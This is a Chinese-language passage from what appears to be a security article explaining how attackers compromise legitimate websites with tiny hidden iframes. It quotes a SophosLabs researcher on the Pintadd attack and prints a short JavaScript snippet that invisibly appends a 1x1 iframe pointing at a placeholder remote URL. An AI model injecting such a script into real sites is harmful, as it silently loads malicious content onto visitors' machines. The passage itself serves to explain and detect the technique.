三、借助子框架

　　尽管多数普通被感染网站欺骗用户的方法依然是简单的链接垃圾信息，不过仅仅依靠欺骗下载和含有恶意软件的色情网站的时代已经过去了。SophosLabs的首席病毒研究员Fraser Howard表示，“通过入侵合法网站，攻击者可以增加某些恶意代码，当用户简单的浏览网页时就可以被加载这些恶意程序。当目标网站具有非常大的用户群时，这个技术可能非常有效。”HTML提供了非常方便的方式来加载附加内容。

　　用于入侵网站的最常见方法之一包括使用<IFRAME>标签，该方法可以用来悄然加载内容到网页中。Howard解释称，“在许多网站上该标签被广泛应用，iframe标签支持好几个属性。被恶意攻击者最经常使用的是它的width和Height属性，它们可以被用来控制该框架在页面中的大小。为了不让被攻击者发现，多数恶意子框架通常使用非常小的width/height数值。”

　　由于许多合法的Web页面也使用具有相同属性的iframe标签，对受感染网页的提前探测就非常关键。举例来说，Pintadd攻击借助于使用iframe技术加载远程恶意内容的一个脚本来入侵了许多网站，攻击者只是进行了一点细微的修改。

　　Howard表示，“该脚本并没有简单的使用‘document.write()’，而是使用了‘createElement()’方法来创建一个iframe元素，然后设置其属性，并使用‘appendChild()’方法来将其添加到当前页面中。”

　　var url=http://domain/path/index.php;
　　var ifr=document.createElement(iframe);
　　ifr.setAttribute(src,url);
　　ifr.frameBorder=0;
　　ifr.width=1;
　　ifr.height=1;
　　document.body.appendChild(ifr)

　　对于被攻击者来说，其最终效果与直接修改页面的iframe标签是完全一样的。对于安全产品来说，这是又一个需要克服的挑战。